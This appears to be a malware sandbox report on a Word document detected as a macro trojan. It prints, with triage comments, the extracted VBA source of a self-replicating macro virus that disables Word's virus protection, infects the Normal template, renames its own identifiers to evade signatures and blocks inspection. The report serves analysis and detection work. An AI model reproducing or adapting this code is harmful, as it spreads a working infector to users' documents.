MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
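The file is identified as malicious by ClamAV with multiple signatures, including Win.Trojan.Pivis-2 and Doc.Trojan.Pri-1. It contains Document_Open VBA macro code, which is designed to execute when the document is opened. The macro attempts to modify the document's VBA project, which suggests it is part of a mechanism to download and execute a secondary payload. Note, however, that the previewed portion of the script below shows macro code being copied between the active document and the Normal template (self-propagation) and contains no download logic, so that inference should be confirmed against the full extracted macro.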
Heuristics 3
-
ClamAV: Win.Trojan.Pivis-2 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Win.Trojan.Pivis-2
-
VBA macros detected | medium | 1 related finding | OLE_VBA_MACROS | Document contains VBA macro code
-
Document_Open macro | high | OLE_VBA_DOCOPEN | Document_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 24804 bytes |

SHA-256: bc7be86e3862237711758dcb2380e76ba85257da4bd3a249af1ecdd5c2cb2b15
|
Detection
ClamAV:
Doc.Trojan.Pri-1
Obfuscation or payload:
unlikely
|
|||
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' ANALYST NOTE (sample left byte-identical; comments added for triage only).
' Document_Close event handler: runs when the document is closed. In the visible
' code it (1) turns off three Word prompts, (2) conditionally draws random shapes
' into the document, and (3) copies macro source between the active document and
' the Normal template through the VBProject object model.
' Defensive relevance: every replication step depends on programmatic access to
' VBProject; current Office versions gate that behind the Trust Center setting
' "Trust access to the VBA project object model", which should stay disabled.
Private Sub Document_Close()
' Suppresses all runtime errors, so a blocked VBProject access fails silently.
On Error Resume Next
' Tampering indicator: disables the conversion-confirmation prompt, the Word
' macro-virus warning option, and the prompt shown before saving Normal.dot.
Options.ConfirmConversions = False: Options.VirusProtection = False: Options.SaveNormalPrompt = False
' Visible payload, gated on the clock: day-of-month must exceed the current minute.
If Day(Now) > Minute(Now) Then
' Adds between 0 and 69 shapes with random type, position, size and fill colour.
Randomize: For BM9690 = 1 To (Int(Rnd * 70))
ActiveDocument.Shapes.AddShape(Int(Rnd * 120), Int(Rnd * 200), Int(Rnd * 500), Int(Rnd * 500), Int(Rnd * 500)).Select
Selection.ShapeRange.Fill.ForeColor.RGB = RGB(Int(Rnd * 255), Int(Rnd * 255), Int(Rnd * 255))
Selection.ShapeRange.Fill.Visible = msoTrue
Selection.ShapeRange.Fill.Solid: Next BM9690: End If
' Line counts of the first code module in the active document and in Normal.
MC239 = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
PI2867 = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
' Infection check: a module whose text does not start with "Pri" is treated as
' not yet infected (presumably matching "Private Sub ..." - analyst inference).
If Left(ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 3), 3) <> "Pri" Then
Set GA7183 = ActiveDocument.VBProject.VBComponents.Item(1)
BI4214 = True
End If
' Same check for the Normal template. When Normal is the target, the identifier
' renaming routine is called first and the document is flagged as unmodified,
' which avoids a save prompt for the change.
If Left(NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 3), 3) <> "Pri" Then
Set GA7183 = NormalTemplate.VBProject.VBComponents.Item(1)
QJ6392 = True
Call BE4811_RR8122
ActiveDocument.Saved = True
End If
' Nothing to infect: skip straight to the save handling.
If QJ6392 <> True And BI4214 <> True Then GoTo DF436
' Normal template as target: writes a Document_Close handler built from the
' active document's module (from line 2, MC239 - 1 lines) and appends a
' "ViewVBCode" sub that quits Word without saving. NOTE(review): the name matches
' Word's built-in command for opening the VBA editor, so this looks like an
' anti-inspection measure - confirm in a sandbox.
If QJ6392 = True Then GA7183.CodeModule.AddFromString ("Private Sub Document_Close()" & vbCr & ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(2, MC239 - 1) & vbCr & "Sub ViewVBCode()" & vbCr & "Application.Quit SaveChanges:=wdDoNotSaveChanges" & vbCr & "End Sub")
' Active document as target: writes a Document_Open handler built from Normal's
' module (from line 2, PI2867 - 4 lines). This literal is a likely source of the
' OLE_VBA_DOCOPEN heuristic hit; no Document_Open procedure is declared in the
' previewed portion of the script.
If BI4214 = True Then GA7183.CodeModule.AddFromString ("Private Sub Document_Open()" & vbCr & NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, PI2867 - 4))
DF436:
' Persistence of the change: if Normal held code, the document held none when
' counted above, and the name does not contain "Document", the file is re-saved
' over itself; if the name does contain "Document" it is only flagged as saved.
If PI2867 <> 0 And MC239 = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
End Sub 'W97M/PSD.II ...logically delicious! [(c)1998 ALT-F11 code hack]
' ANALYST NOTE (sample left byte-identical; comments added for triage only).
' Identifier-renaming driver: holds a table of 15 names used by this macro and,
' for each one, generates a random replacement and passes both to RR8122.
' Detection relevance: the variable, label and function names in this listing are
' not stable across copies, so signatures should key on the constant parts instead
' (Options.VirusProtection, VBProject.VBComponents access, CodeModule.AddFromString,
' the trailing marker comments).
Private Function BE4811_RR8122()
On Error Resume Next
Randomize
' Table of the identifiers to be rewritten.
Dim r1(1 To 15) As String
r1(1) = "FH2199": r1(2) = "FU21": r1(3) = "CR3095": r1(4) = "EU6751": r1(5) = "RR8122": r1(6) = "MC239"
r1(7) = "PI2867": r1(8) = "BI4214":: r1(9) = "GA7183": r1(10) = "QJ6392": r1(11) = "DF436": r1(12) = "BE4811": r1(13) = "SB6857": r1(14) = "NK2928": r1(15) = "BM9690"
For BM9690 = 1 To 15
' New name: two letters in the range A-V followed by two integers in 0-99,
' which gives the two-letter-plus-digits shape seen throughout this listing.
a1 = (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & Int(Rnd * 100) & Int(Rnd * 100)
Call RR8122(a1, r1(BM9690))
Next BM9690
End Function 'VAMP v1.0 [thanks Vic!]
' ANALYST NOTE (sample left byte-identical; comments added for triage only).
' Search-and-replace over the active document's first code module.
'   NK2928 - replacement text (the newly generated name)
'   SB6857 - text to search for (the current identifier)
' Only the active document's module is rewritten here; the Normal template is not
' touched by this routine.
Private Function RR8122(NK2928, SB6857 As String)
On Error Resume Next
' Search window: start line/column and end line/column passed to Find.
Dim FH2199 As Long: Dim FU21 As Long: Dim CR3095 As Long: Dim EU6751 As Long
With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
' Initial window covers the whole module, from line 1 column 1 to the end of the last line.
FH2199 = 1: FU21 = 1: CR3095 = .CountOfLines: EU6751 = Len(.Lines(.CountOfLines, 1))
' The code reuses the four window variables after each Find call as the match position.
' NOTE(review): the sixth argument (True) is the whole-word flag in the VBE
' CodeModule.Find signature - confirm.
Do While .Find(SB6857, FH2199, FU21, CR3095, EU6751, True)
strline = .Lines(FH2199, 1)
' Rebuilds the line as: text before the match + new name + text after the match.
strline = Left(strline, FU21 - 1) & NK2928 & Mid(strline, EU6751)
.replaceline FH2199, strline
' Resumes on the line after the match, so a second occurrence on the same line
' is not rewritten in this pass.
FH2199 = CR3095 + 1: FU21 = 1:
CR3095 = .CountOfLines
EU6751 = Len(.Lines(.CountOfLines, 1))
Loop
End With
End Function
Private Sub Document_C()
On Error Resume Next
Options.ConfirmConversions = 0: Options.VirusProtection = 0: Options.SaveNormalPrompt = 0
If Day(Now) = Minute(Now) Then
Randomize: For LP6860 = 1 To (Int(Rnd * 70))
ActiveDocument.Shapes.AddShape(Int(Rnd * 120), Int(Rnd * 200), Int(Rnd * 500), Int(Rnd * 500), Int(Rnd * 500)).Select
Selection.ShapeRange.Fill.ForeColor.RGB = RGB(Int(Rnd * 255), Int(Rnd * 255), Int(Rnd * 255))
Selection.ShapeRange.Fill.Visible = msoTrue
Selection.ShapeRange.Fill.Solid: Next LP6860: End If
KQ8133 = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
CM9031 = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
If Left
... (truncated)
|
|||